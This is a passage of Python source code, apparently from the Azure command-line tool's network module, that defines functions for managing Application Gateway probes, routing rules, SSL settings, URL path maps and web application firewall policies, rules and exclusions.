return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
parent = sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag).result()
return find_child_item(parent, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def update_ag_rewrite_rule_condition(instance, parent, cmd, rule_set_name, rule_name, variable, pattern=None,
ignore_case=None, negate=None):
with cmd.update_context(instance) as c:
c.set_param('pattern', pattern)
c.set_param('ignore_case', ignore_case)
c.set_param('negate', negate)
return parent
def show_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_item(gateway, rule_set_name, rule_name, variable,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name.variable')
def list_ag_rewrite_rule_conditions(cmd, resource_group_name, application_gateway_name, rule_set_name, rule_name):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
return find_child_collection(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules.conditions', key_path='name.name')
def delete_ag_rewrite_rule_condition(cmd, resource_group_name, application_gateway_name, rule_set_name,
rule_name, variable, no_wait=None):
client = network_client_factory(cmd.cli_ctx).application_gateways
gateway = client.get(resource_group_name, application_gateway_name)
rule = find_child_item(gateway, rule_set_name, rule_name,
path='rewrite_rule_sets.rewrite_rules', key_path='name.name')
condition = find_child_item(rule, variable, path='conditions', key_path='variable')
rule.conditions.remove(condition)
sdk_no_wait(no_wait, client.begin_create_or_update, resource_group_name, application_gateway_name, gateway)
def create_ag_probe(cmd, resource_group_name, application_gateway_name, item_name, protocol, host,
path, interval=30, timeout=120, threshold=8, no_wait=False, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
ApplicationGatewayProbe, ProbeMatchCriteria = cmd.get_models(
'ApplicationGatewayProbe', 'ApplicationGatewayProbeHealthResponseMatch')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_probe = ApplicationGatewayProbe(
name=item_name,
protocol=protocol,
host=host,
path=path,
interval=interval,
timeout=timeout,
unhealthy_threshold=threshold)
if cmd.supported_api_version(min_api='2017-06-01'):
new_probe.pick_host_name_from_backend_http_settings = host_name_from_http_settings
new_probe.min_servers = min_servers
new_probe.match = ProbeMatchCriteria(body=match_body, status_codes=match_status_codes)
if cmd.supported_api_version(min_api='2019-04-01'):
new_probe.port = port
upsert_to_collection(ag, 'probes', new_probe, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_probe(cmd, instance, parent, item_name, protocol=None, host=None, path=None,
interval=None, timeout=None, threshold=None, host_name_from_http_settings=None,
min_servers=None, match_body=None, match_status_codes=None, port=None):
if protocol is not None:
instance.protocol = protocol
if host is not None:
instance.host = host
if path is not None:
instance.path = path
if interval is not None:
instance.interval = interval
if timeout is not None:
instance.timeout = timeout
if threshold is not None:
instance.unhealthy_threshold = threshold
if host_name_from_http_settings is not None:
instance.pick_host_name_from_backend_http_settings = host_name_from_http_settings
if min_servers is not None:
instance.min_servers = min_servers
if match_body is not None or match_status_codes is not None:
ProbeMatchCriteria = \
cmd.get_models('ApplicationGatewayProbeHealthResponseMatch')
instance.match = instance.match or ProbeMatchCriteria()
if match_body is not None:
instance.match.body = match_body
if match_status_codes is not None:
instance.match.status_codes = match_status_codes
if port is not None:
instance.port = port
return parent
def create_ag_request_routing_rule(cmd, resource_group_name, application_gateway_name, item_name,
address_pool=None, http_settings=None, http_listener=None, redirect_config=None,
url_path_map=None, rule_type='Basic', no_wait=False, rewrite_rule_set=None,
priority=None):
ApplicationGatewayRequestRoutingRule, SubResource = cmd.get_models(
'ApplicationGatewayRequestRoutingRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
if not address_pool and not redirect_config:
address_pool = _get_default_id(ag, 'backend_address_pools', '--address-pool')
if not http_settings and not redirect_config:
http_settings = _get_default_id(ag, 'backend_http_settings_collection', '--http-settings')
if not http_listener:
http_listener = _get_default_id(ag, 'http_listeners', '--http-listener')
new_rule = ApplicationGatewayRequestRoutingRule(
name=item_name,
rule_type=rule_type,
priority=priority,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
http_listener=SubResource(id=http_listener),
url_path_map=SubResource(id=url_path_map) if url_path_map else None)
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
upsert_to_collection(ag, 'request_routing_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_request_routing_rule(cmd, instance, parent, item_name, address_pool=None,
http_settings=None, http_listener=None, redirect_config=None, url_path_map=None,
rule_type=None, rewrite_rule_set=None, priority=None):
SubResource = cmd.get_models('SubResource')
if address_pool is not None:
instance.backend_address_pool = SubResource(id=address_pool)
if http_settings is not None:
instance.backend_http_settings = SubResource(id=http_settings)
if redirect_config is not None:
instance.redirect_configuration = SubResource(id=redirect_config)
if http_listener is not None:
instance.http_listener = SubResource(id=http_listener)
if url_path_map is not None:
instance.url_path_map = SubResource(id=url_path_map)
if rule_type is not None:
instance.rule_type = rule_type
if rewrite_rule_set is not None:
instance.rewrite_rule_set = SubResource(id=rewrite_rule_set)
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
return parent
def create_ag_ssl_certificate(cmd, resource_group_name, application_gateway_name, item_name, cert_data=None,
cert_password=None, key_vault_secret_id=None, no_wait=False):
ApplicationGatewaySslCertificate = cmd.get_models('ApplicationGatewaySslCertificate')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_cert = ApplicationGatewaySslCertificate(
name=item_name, data=cert_data, password=cert_password, key_vault_secret_id=key_vault_secret_id)
upsert_to_collection(ag, 'ssl_certificates', new_cert, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_ssl_certificate(instance, parent, item_name,
cert_data=None, cert_password=None, key_vault_secret_id=None):
if cert_data is not None:
instance.data = cert_data
if cert_password is not None:
instance.password = cert_password
if key_vault_secret_id is not None:
instance.key_vault_secret_id = key_vault_secret_id
return parent
def set_ag_ssl_policy_2017_03_01(cmd, resource_group_name, application_gateway_name, disabled_ssl_protocols=None,
clear=False, no_wait=False):
ApplicationGatewaySslPolicy = cmd.get_models('ApplicationGatewaySslPolicy')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.ssl_policy = None if clear else ApplicationGatewaySslPolicy(
disabled_ssl_protocols=disabled_ssl_protocols)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_ssl_policy_2017_06_01(cmd, resource_group_name, application_gateway_name, policy_name=None, policy_type=None,
disabled_ssl_protocols=None, cipher_suites=None, min_protocol_version=None,
no_wait=False):
ApplicationGatewaySslPolicy, ApplicationGatewaySslPolicyType = cmd.get_models(
'ApplicationGatewaySslPolicy', 'ApplicationGatewaySslPolicyType')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
policy_type = None
if policy_name:
policy_type = ApplicationGatewaySslPolicyType.predefined.value
elif cipher_suites or min_protocol_version:
policy_type = ApplicationGatewaySslPolicyType.custom.value
ag.ssl_policy = ApplicationGatewaySslPolicy(
policy_name=policy_name,
policy_type=policy_type,
disabled_ssl_protocols=disabled_ssl_protocols,
cipher_suites=cipher_suites,
min_protocol_version=min_protocol_version)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_ssl_policy(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).ssl_policy
def create_ag_trusted_root_certificate(cmd, resource_group_name, application_gateway_name, item_name, no_wait=False,
cert_data=None, keyvault_secret=None):
ApplicationGatewayTrustedRootCertificate = cmd.get_models('ApplicationGatewayTrustedRootCertificate')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
root_cert = ApplicationGatewayTrustedRootCertificate(name=item_name, data=cert_data,
key_vault_secret_id=keyvault_secret)
upsert_to_collection(ag, 'trusted_root_certificates', root_cert, 'name')
return sdk_no_wait(no_wait, ncf.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_trusted_root_certificate(instance, parent, item_name, cert_data=None, keyvault_secret=None):
if cert_data is not None:
instance.data = cert_data
if keyvault_secret is not None:
instance.key_vault_secret_id = keyvault_secret
return parent
def create_ag_url_path_map(cmd, resource_group_name, application_gateway_name, item_name, paths,
address_pool=None, http_settings=None, redirect_config=None, rewrite_rule_set=None,
default_address_pool=None, default_http_settings=None, default_redirect_config=None,
no_wait=False, rule_name='default', default_rewrite_rule_set=None, firewall_policy=None):
ApplicationGatewayUrlPathMap, ApplicationGatewayPathRule, SubResource = cmd.get_models(
'ApplicationGatewayUrlPathMap', 'ApplicationGatewayPathRule', 'SubResource')
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
new_rule = ApplicationGatewayPathRule(
name=rule_name,
backend_address_pool=SubResource(id=address_pool) if address_pool else None,
backend_http_settings=SubResource(id=http_settings) if http_settings else None,
paths=paths
)
new_map = ApplicationGatewayUrlPathMap(
name=item_name,
default_backend_address_pool=SubResource(id=default_address_pool) if default_address_pool else None,
default_backend_http_settings=SubResource(id=default_http_settings) if default_http_settings else None,
path_rules=[])
if cmd.supported_api_version(min_api='2017-06-01'):
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else None
new_map.default_redirect_configuration = \
SubResource(id=default_redirect_config) if default_redirect_config else None
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
new_map.default_rewrite_rule_set = \
SubResource(id=default_rewrite_rule_set) if default_rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
# pull defaults from the rule specific properties if the default-* option isn't specified
if new_rule.backend_address_pool and not new_map.default_backend_address_pool:
new_map.default_backend_address_pool = new_rule.backend_address_pool
if new_rule.backend_http_settings and not new_map.default_backend_http_settings:
new_map.default_backend_http_settings = new_rule.backend_http_settings
if new_rule.redirect_configuration and not new_map.default_redirect_configuration:
new_map.default_redirect_configuration = new_rule.redirect_configuration
new_map.path_rules.append(new_rule)
upsert_to_collection(ag, 'url_path_maps', new_map, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def update_ag_url_path_map(cmd, instance, parent, item_name, default_address_pool=None,
default_http_settings=None, default_redirect_config=None, raw=False,
default_rewrite_rule_set=None):
SubResource = cmd.get_models('SubResource')
if default_address_pool == '':
instance.default_backend_address_pool = None
elif default_address_pool:
instance.default_backend_address_pool = SubResource(id=default_address_pool)
if default_http_settings == '':
instance.default_backend_http_settings = None
elif default_http_settings:
instance.default_backend_http_settings = SubResource(id=default_http_settings)
if default_redirect_config == '':
instance.default_redirect_configuration = None
elif default_redirect_config:
instance.default_redirect_configuration = SubResource(id=default_redirect_config)
if default_rewrite_rule_set == '':
instance.default_rewrite_rule_set = None
elif default_rewrite_rule_set:
instance.default_rewrite_rule_set = SubResource(id=default_rewrite_rule_set)
return parent
def create_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, paths, address_pool=None, http_settings=None, redirect_config=None,
firewall_policy=None, no_wait=False, rewrite_rule_set=None):
ApplicationGatewayPathRule, SubResource = cmd.get_models('ApplicationGatewayPathRule', 'SubResource')
if address_pool and redirect_config:
raise CLIError("Cannot reference a BackendAddressPool when Redirect Configuration is specified.")
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
default_backend_pool = SubResource(id=url_map.default_backend_address_pool.id) \
if (url_map.default_backend_address_pool and not redirect_config) else None
default_http_settings = SubResource(id=url_map.default_backend_http_settings.id) \
if url_map.default_backend_http_settings else None
new_rule = ApplicationGatewayPathRule(
name=item_name,
paths=paths,
backend_address_pool=SubResource(id=address_pool) if address_pool else default_backend_pool,
backend_http_settings=SubResource(id=http_settings) if http_settings else default_http_settings)
if cmd.supported_api_version(min_api='2017-06-01'):
default_redirect = SubResource(id=url_map.default_redirect_configuration.id) \
if (url_map.default_redirect_configuration and not address_pool) else None
new_rule.redirect_configuration = SubResource(id=redirect_config) if redirect_config else default_redirect
rewrite_rule_set_name = next(key for key, value in locals().items() if id(value) == id(rewrite_rule_set))
if cmd.supported_api_version(parameter_name=rewrite_rule_set_name):
new_rule.rewrite_rule_set = SubResource(id=rewrite_rule_set) if rewrite_rule_set else None
if cmd.supported_api_version(min_api='2019-09-01'):
new_rule.firewall_policy = SubResource(id=firewall_policy) if firewall_policy else None
upsert_to_collection(url_map, 'path_rules', new_rule, 'name')
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def delete_ag_url_path_map_rule(cmd, resource_group_name, application_gateway_name, url_path_map_name,
item_name, no_wait=False):
ncf = network_client_factory(cmd.cli_ctx)
ag = ncf.application_gateways.get(resource_group_name, application_gateway_name)
url_map = next((x for x in ag.url_path_maps if x.name == url_path_map_name), None)
if not url_map:
raise CLIError('URL path map "{}" not found.'.format(url_path_map_name))
url_map.path_rules = \
[x for x in url_map.path_rules if x.name.lower() != item_name.lower()]
return sdk_no_wait(no_wait, ncf.application_gateways.begin_create_or_update,
resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2016_09_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
no_wait=False):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode)
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def set_ag_waf_config_2017_03_01(cmd, resource_group_name, application_gateway_name, enabled,
firewall_mode=None,
rule_set_type='OWASP', rule_set_version=None,
disabled_rule_groups=None,
disabled_rules=None, no_wait=False,
request_body_check=None, max_request_body_size=None, file_upload_limit=None,
exclusions=None):
ApplicationGatewayWebApplicationFirewallConfiguration = cmd.get_models(
'ApplicationGatewayWebApplicationFirewallConfiguration')
ncf = network_client_factory(cmd.cli_ctx).application_gateways
ag = ncf.get(resource_group_name, application_gateway_name)
ag.web_application_firewall_configuration = \
ApplicationGatewayWebApplicationFirewallConfiguration(
enabled=(enabled == 'true'), firewall_mode=firewall_mode, rule_set_type=rule_set_type,
rule_set_version=rule_set_version)
if disabled_rule_groups or disabled_rules:
ApplicationGatewayFirewallDisabledRuleGroup = cmd.get_models('ApplicationGatewayFirewallDisabledRuleGroup')
disabled_groups = []
# disabled groups can be added directly
for group in disabled_rule_groups or []:
disabled_groups.append(ApplicationGatewayFirewallDisabledRuleGroup(rule_group_name=group))
def _flatten(collection, expand_property_fn):
for each in collection:
for value in expand_property_fn(each):
yield value
# for disabled rules, we have to look up the IDs
if disabled_rules:
results = list_ag_waf_rule_sets(ncf, _type=rule_set_type, version=rule_set_version, group='*')
for group in _flatten(results, lambda r: r.rule_groups):
disabled_group = ApplicationGatewayFirewallDisabledRuleGroup(
rule_group_name=group.rule_group_name, rules=[])
for rule in group.rules:
if str(rule.rule_id) in disabled_rules:
disabled_group.rules.append(rule.rule_id)
if disabled_group.rules:
disabled_groups.append(disabled_group)
ag.web_application_firewall_configuration.disabled_rule_groups = disabled_groups
if cmd.supported_api_version(min_api='2018-08-01'):
ag.web_application_firewall_configuration.request_body_check = request_body_check
ag.web_application_firewall_configuration.max_request_body_size_in_kb = max_request_body_size
ag.web_application_firewall_configuration.file_upload_limit_in_mb = file_upload_limit
ag.web_application_firewall_configuration.exclusions = exclusions
return sdk_no_wait(no_wait, ncf.begin_create_or_update, resource_group_name, application_gateway_name, ag)
def show_ag_waf_config(cmd, resource_group_name, application_gateway_name):
return network_client_factory(cmd.cli_ctx).application_gateways.get(
resource_group_name, application_gateway_name).web_application_firewall_configuration
def list_ag_waf_rule_sets(client, _type=None, version=None, group=None):
results = client.list_available_waf_rule_sets().value
filtered_results = []
# filter by rule set name or version
for rule_set in results:
if _type and _type.lower() != rule_set.rule_set_type.lower():
continue
if version and version.lower() != rule_set.rule_set_version.lower():
continue
filtered_groups = []
for rule_group in rule_set.rule_groups:
if not group:
rule_group.rules = None
filtered_groups.append(rule_group)
elif group.lower() == rule_group.rule_group_name.lower() or group == '*':
filtered_groups.append(rule_group)
if filtered_groups:
rule_set.rule_groups = filtered_groups
filtered_results.append(rule_set)
return filtered_results
# endregion
# region ApplicationGatewayWAFPolicy
def create_ag_waf_policy(cmd, client, resource_group_name, policy_name,
location=None, tags=None, rule_set_type='OWASP',
rule_set_version='3.0'):
WebApplicationFirewallPolicy, ManagedRulesDefinition, \
ManagedRuleSet = cmd.get_models('WebApplicationFirewallPolicy',
'ManagedRulesDefinition',
'ManagedRuleSet')
# https://docs.microsoft.com/en-us/azure/application-gateway/waf-overview
# mandatory default rule with empty rule sets
managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type, rule_set_version=rule_set_version)
managed_rule_definition = ManagedRulesDefinition(managed_rule_sets=[managed_rule_set])
waf_policy = WebApplicationFirewallPolicy(location=location, tags=tags, managed_rules=managed_rule_definition)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_ag_waf_policy(cmd, instance, tags=None):
with cmd.update_context(instance) as c:
c.set_param('tags', tags)
return instance
def list_ag_waf_policies(cmd, resource_group_name=None):
return _generic_list(cmd.cli_ctx, 'web_application_firewall_policies', resource_group_name)
# endregion
# region ApplicationGatewayWAFPolicyRules PolicySettings
def update_waf_policy_setting(cmd, instance,
state=None, mode=None,
max_request_body_size_in_kb=None, file_upload_limit_in_mb=None,
request_body_check=False):
if state is not None:
instance.policy_settings.state = state
if mode is not None:
instance.policy_settings.mode = mode
if max_request_body_size_in_kb is not None:
instance.policy_settings.max_request_body_size_in_kb = max_request_body_size_in_kb
if file_upload_limit_in_mb is not None:
instance.policy_settings.file_upload_limit_in_mb = file_upload_limit_in_mb
if request_body_check is not None:
instance.policy_settings.request_body_check = request_body_check
return instance
def list_waf_policy_setting(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).policy_settings
# endregion
# region ApplicationGatewayWAFPolicyRules
def create_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, priority, rule_type, action):
"""
Initialize custom rule for WAF policy
"""
WebApplicationFirewallCustomRule = cmd.get_models('WebApplicationFirewallCustomRule')
waf_policy = client.get(resource_group_name, policy_name)
new_custom_rule = WebApplicationFirewallCustomRule(
name=rule_name,
action=action,
match_conditions=[],
priority=priority,
rule_type=rule_type
)
upsert_to_collection(waf_policy, 'custom_rules', new_custom_rule, 'name')
parent = client.create_or_update(resource_group_name, policy_name, waf_policy)
return find_child_item(parent, rule_name, path='custom_rules', key_path='name')
# pylint: disable=unused-argument
def update_waf_custom_rule(instance, parent, cmd, rule_name, priority=None, rule_type=None, action=None):
with cmd.update_context(instance) as c:
c.set_param('priority', priority)
c.set_param('rule_type', rule_type)
c.set_param('action', action)
return parent
def show_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
def list_waf_custom_rules(cmd, client, resource_group_name, policy_name):
return client.get(resource_group_name, policy_name).custom_rules
def delete_waf_custom_rule(cmd, client, resource_group_name, policy_name, rule_name, no_wait=None):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
waf_policy.custom_rules.remove(rule)
sdk_no_wait(no_wait, client.create_or_update, resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicyRuleMatchConditions
def add_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name,
match_variables, operator, match_values, negation_condition=None, transforms=None):
MatchCondition = cmd.get_models('MatchCondition')
waf_policy = client.get(resource_group_name, policy_name)
custom_rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
new_cond = MatchCondition(
match_variables=match_variables,
operator=operator,
match_values=match_values,
negation_conditon=negation_condition,
transforms=transforms
)
custom_rule.match_conditions.append(new_cond)
upsert_to_collection(waf_policy, 'custom_rules', custom_rule, 'name', warn=False)
client.create_or_update(resource_group_name, policy_name, waf_policy)
return new_cond
def list_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name):
waf_policy = client.get(resource_group_name, policy_name)
return find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name').match_conditions
def remove_waf_custom_rule_match_cond(cmd, client, resource_group_name, policy_name, rule_name, index):
waf_policy = client.get(resource_group_name, policy_name)
rule = find_child_item(waf_policy, rule_name, path='custom_rules', key_path='name')
rule.match_conditions.pop(index)
client.create_or_update(resource_group_name, policy_name, waf_policy)
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule ManagedRuleSet
def add_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
rule_group_name=None, rules=None):
"""
Add managed rule set to the WAF policy managed rules.
Visit: https://docs.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-crs-rulegroups-rules
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
waf_policy = client.get(resource_group_name, policy_name)
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules is not None else []
rule_group_override = None
if rule_group_name is not None:
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides)
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_override in rule_set.rule_group_overrides:
if rule_override.rule_group_name == rule_group_name:
# Add one rule
rule_override.rules.extend(managed_rule_overrides)
break
else:
# Add one rule group
if rule_group_override is not None:
rule_set.rule_group_overrides.append(rule_group_override)
break
else:
# Add new rule set
waf_policy.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def update_waf_managed_rule_set(cmd, instance, rule_set_type, rule_set_version, rule_group_name=None, rules=None):
"""
Update(Override) existing rule set of a WAF policy managed rules.
"""
ManagedRuleSet, ManagedRuleGroupOverride, ManagedRuleOverride = \
cmd.get_models('ManagedRuleSet', 'ManagedRuleGroupOverride', 'ManagedRuleOverride')
managed_rule_overrides = [ManagedRuleOverride(rule_id=r) for r in rules] if rules else None
rule_group_override = ManagedRuleGroupOverride(rule_group_name=rule_group_name,
rules=managed_rule_overrides) if managed_rule_overrides else None
new_managed_rule_set = ManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_group_overrides=[rule_group_override] if rule_group_override is not None else []) # pylint: disable=line-too-long
updated_rule_set = None
for rule_set in instance.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version != rule_set_version:
updated_rule_set = rule_set
break
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
updated_rule_set = rule_set
break
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg:
rg.rules = managed_rule_overrides # differentiate with add_waf_managed_rule_set()
else:
rule_set.rule_group_overrides.append(rule_group_override)
if updated_rule_set:
instance.managed_rules.managed_rule_sets.remove(updated_rule_set)
instance.managed_rules.managed_rule_sets.append(new_managed_rule_set)
return instance
def remove_waf_managed_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version, rule_group_name=None):
"""
Remove a managed rule set by rule set group name if rule_group_name is specified. Otherwise, remove all rule set.
"""
waf_policy = client.get(resource_group_name, policy_name)
delete_rule_set = None
for rule_set in waf_policy.managed_rules.managed_rule_sets:
if rule_set.rule_set_type == rule_set_type or rule_set.rule_set_version == rule_set_version:
if rule_group_name is None:
delete_rule_set = rule_set
break
# Remove one rule from rule group
rg = next((rg for rg in rule_set.rule_group_overrides if rg.rule_group_name == rule_group_name), None)
if rg is None:
raise CLIError('Rule set group [ {} ] not found.'.format(rule_group_name))
rule_set.rule_group_overrides.remove(rg)
if delete_rule_set:
waf_policy.managed_rules.managed_rule_sets.remove(delete_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationGatewayWAFPolicy ManagedRule OwaspCrsExclusionEntry
def add_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name,
match_variable, selector_match_operator, selector):
OwaspCrsExclusionEntry = cmd.get_models('OwaspCrsExclusionEntry')
exclusion_entry = OwaspCrsExclusionEntry(match_variable=match_variable,
selector_match_operator=selector_match_operator,
selector=selector)
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions.append(exclusion_entry)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def remove_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
waf_policy.managed_rules.exclusions = []
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_managed_rule_exclusion(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# pylint: disable=line-too-long
# pylint: disable=too-many-nested-blocks
def add_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None, rule_ids=None):
ExclusionManagedRuleSet, ExclusionManagedRuleGroup, ExclusionManagedRule = \
cmd.get_models('ExclusionManagedRuleSet', 'ExclusionManagedRuleGroup', 'ExclusionManagedRule')
waf_policy = client.get(resource_group_name, policy_name)
# build current rules from ids
rules = [ExclusionManagedRule(rule_id=rule_id) for rule_id in rule_ids] if rule_ids is not None else []
# build current rule group from rules
curr_rule_group = None
if rule_group_name is not None:
curr_rule_group = ExclusionManagedRuleGroup(rule_group_name=rule_group_name,
rules=rules)
# build current rule set from rule group
curr_rule_set = ExclusionManagedRuleSet(rule_set_type=rule_set_type,
rule_set_version=rule_set_version,
rule_groups=[curr_rule_group] if curr_rule_group is not None else [])
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_set.rule_set_type == rule_set_type and rule_set.rule_set_version == rule_set_version:
for rule_group in rule_set.rule_groups:
# add rules when rule group exists
if rule_group.rule_group_name == rule_group_name:
rule_group.rules.extend(rules)
break
else:
# add a new rule group
if curr_rule_group is not None:
rule_set.rule_groups.append(curr_rule_group)
break
else:
# add a new rule set
exclusion.exclusion_managed_rule_sets.append(curr_rule_set)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
# pylint: disable=line-too-long
def remove_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name,
rule_set_type, rule_set_version,
match_variable, selector_match_operator, selector,
rule_group_name=None):
waf_policy = client.get(resource_group_name, policy_name)
to_be_deleted = None
for exclusion in waf_policy.managed_rules.exclusions:
if exclusion.match_variable == match_variable and exclusion.selector_match_operator == selector_match_operator and exclusion.selector == selector:
for rule_set in exclusion.exclusion_managed_rule_sets:
if rule_group_name is None:
to_be_deleted = rule_set
break
rule_group = next((rule_group for rule_group in rule_set.rule_groups if rule_group.rule_group_name == rule_group_name), None)
if rule_group is None:
err_msg = f"Rule set group [{rule_group_name}] is not found."
raise ResourceNotFoundError(err_msg)
rule_set.rule_groups.remove(rule_group)
if to_be_deleted:
exclusion.exclusion_managed_rule_sets.remove(to_be_deleted)
return client.create_or_update(resource_group_name, policy_name, waf_policy)
def list_waf_exclusion_rule_set(cmd, client, resource_group_name, policy_name):
waf_policy = client.get(resource_group_name, policy_name)
return waf_policy.managed_rules
# endregion
# region ApplicationSecurityGroups
